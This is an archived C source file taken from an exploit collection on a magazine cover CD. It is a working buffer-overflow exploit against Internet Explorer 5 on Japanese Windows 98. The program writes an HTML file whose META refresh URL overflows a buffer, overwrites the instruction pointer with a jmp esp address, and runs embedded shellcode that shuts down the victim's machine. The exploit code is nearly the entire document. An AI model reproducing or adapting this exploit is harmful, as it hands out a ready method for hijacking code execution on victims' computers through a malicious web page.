Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webbrowser / IE / ie5filex.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 1.7 KB | 57 lines

/*========================================================================= Microsoft IE5 for Windows98 exploit The Shadow Penguin Security (http://shadowpenguin.backsection.net) Written by UNYUN (shadowpenguin@backsection.net) ========================================================================= */ #include <stdio.h> #include <windows.h> #define MAXBUF 1000 #define RETADR 53 /* jmp esp (FF E4) code is stored in this area. You must change this address for non-Japanese Windows98 */ #define EIP 0xbfb75a35 unsigned char exploit_code[200]={ 0x43,0x43,0x43,0x43,0x43,0x53,0x53,0x53, 0xB8,0x2D,0x23,0xF5,0xBF,0x48,0x50,0xC3, 0x00 }; main(int argc,char *argv[]) { FILE *fp; unsigned int ip; unsigned char buf[MAXBUF]; if (argc<2){ printf("usage %s output_htmlfile\n",argv[0]); exit(1); } if ((fp=fopen(argv[1],"wb"))==NULL) return FALSE; fprintf(fp,"<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0;URL=file://test/"); memset(buf,0x41,MAXBUF); ip=EIP; buf[RETADR-1]=0x7f; buf[RETADR ]=ip&0xff; buf[RETADR+1]=(ip>>8)&0xff; buf[RETADR+2]=(ip>>16)&0xff; buf[RETADR+3]=( ip>>24)&0xff; memcpy(buf+80,exploit_code,strlen(exploit_code)); buf[MAXBUF]=0; fprintf(fp,"%s/\">\n<HTML>",buf); fprintf(fp,"10 seconds later, this machine will be shut down. "); fprintf(fp,"If you are using IE5 for Japanese Windows98, "); fprintf(fp,"maybe, the exploit code which shuts down your machine will be executed. "); fprintf(fp,"</HTML>\n"); fclose(fp); printf("%s created.\n",argv[1]); return FALSE; }